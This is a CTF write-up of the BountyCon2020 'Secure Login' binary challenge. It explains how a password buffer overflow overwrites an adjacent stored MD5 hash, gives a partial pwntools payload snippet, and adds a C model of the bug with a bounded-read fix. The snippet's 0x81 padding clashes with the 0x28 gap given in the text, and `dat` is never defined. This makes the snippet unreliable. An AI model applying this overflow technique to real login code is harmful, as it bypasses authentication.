The BountyCon2020 CTF is sponsored by Facebook, and the top 20 people from the APAC region will be invited to the invitation-only conference in Singapore.
I solved all the challenges in the CTF and I really enjoyed playing it, and I am invited to the conference.
1. Secure Login
It's an easy binary exploitation challenge. The binary asks for the password, and the comparison is like md5(password) == "hash". We can't crack the hash, though you can find collisions for MD5 in reasonable time. There is a buffer overflow in the password buffer, and the hash is stored directly after the password buffer. For example, the password buffer is at rbp-0x58 and the hash is at rbp-0x30. As there is an overflow in the password buffer, we can overwrite the hash with the MD5 of data we choose, so the comparison succeeds.
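```python
from pwn import *
from hashlib import md5

p = remote("localhost", 10000)
# p = remote("ec2-3-11-37-224.eu-west-2.compute.amazonaws.com",10000)

# Padding that overflows the password buffer, followed by the raw MD5 digest
# that lands on the stored hash. `dat` is the data being hashed; its
# definition is not shown in this post.
payload = b'a'*0x81 + md5(dat).digest()
```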
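The bug class described above, modelled in C next to the bounded read that removes it. This is an added example, not code from the challenge binary or the original post. Assumptions: the `frame` struct stands in for the stack layout (0x28 bytes between the two offsets quoted above), `toy_digest` is a short stand-in for MD5, the check hashes the whole password buffer, and the names `login` and `demo` are hypothetical.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define PW_LEN   0x28  /* rbp-0x58 to rbp-0x30: the gap between the two buffers */
#define HASH_LEN 16    /* MD5 digest size */

/* Model of the adjacent stack objects: the reference hash follows the password. */
struct frame { unsigned char password[PW_LEN]; unsigned char hash[HASH_LEN]; };

/* Stand-in digest (FNV-1a run twice), NOT MD5: the flaw does not depend on the hash. */
static void toy_digest(const unsigned char *in, size_t n, unsigned char *out) {
    uint64_t h = 0xcbf29ce484222325ULL;
    for (int r = 0; r < 2; r++) {
        for (size_t i = 0; i < n; i++) { h ^= in[i]; h *= 0x100000001b3ULL; }
        memcpy(out + 8 * r, &h, 8);
    }
}

/* Assumed check: digest of the whole password buffer compared with the stored hash. */
static int check(const struct frame *f) {
    unsigned char d[HASH_LEN];
    toy_digest(f->password, PW_LEN, d);
    return memcmp(d, f->hash, HASH_LEN) == 0;
}

/* bounded = 0: copy every byte received, so bytes past PW_LEN land in f.hash.
   bounded = 1: reject input longer than the password buffer. */
int login(const unsigned char *in, size_t n, const unsigned char *ref, int bounded) {
    struct frame f;
    memset(&f, 0, sizeof f);
    memcpy(f.hash, ref, HASH_LEN);
    if (bounded && n > PW_LEN) return 0;
    if (n > sizeof f) n = sizeof f;       /* keeps this model itself in bounds */
    memcpy((unsigned char *)&f, in, n);
    return check(&f);
}

/* Constructed input: 0x28 filler bytes followed by the digest of those bytes. */
int demo(int bounded) {
    unsigned char ref[HASH_LEN], in[sizeof(struct frame)];
    unsigned char secret[PW_LEN] = "constructed-secret";
    toy_digest(secret, PW_LEN, ref);      /* the hash the program ships with */
    memset(in, 'a', PW_LEN);
    toy_digest(in, PW_LEN, in + PW_LEN);  /* overwrites the reference hash */
    return login(in, sizeof in, ref, bounded);
}

int main(void) { return !(demo(0) == 1 && demo(1) == 0); }
```

The unbounded copy accepts the input without knowledge of the secret because both sides of the comparison come from the same input; the bounded copy rejects it before the stored hash can be touched.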
I expected a few more binary exploitation challenges, but this is the only challenge given.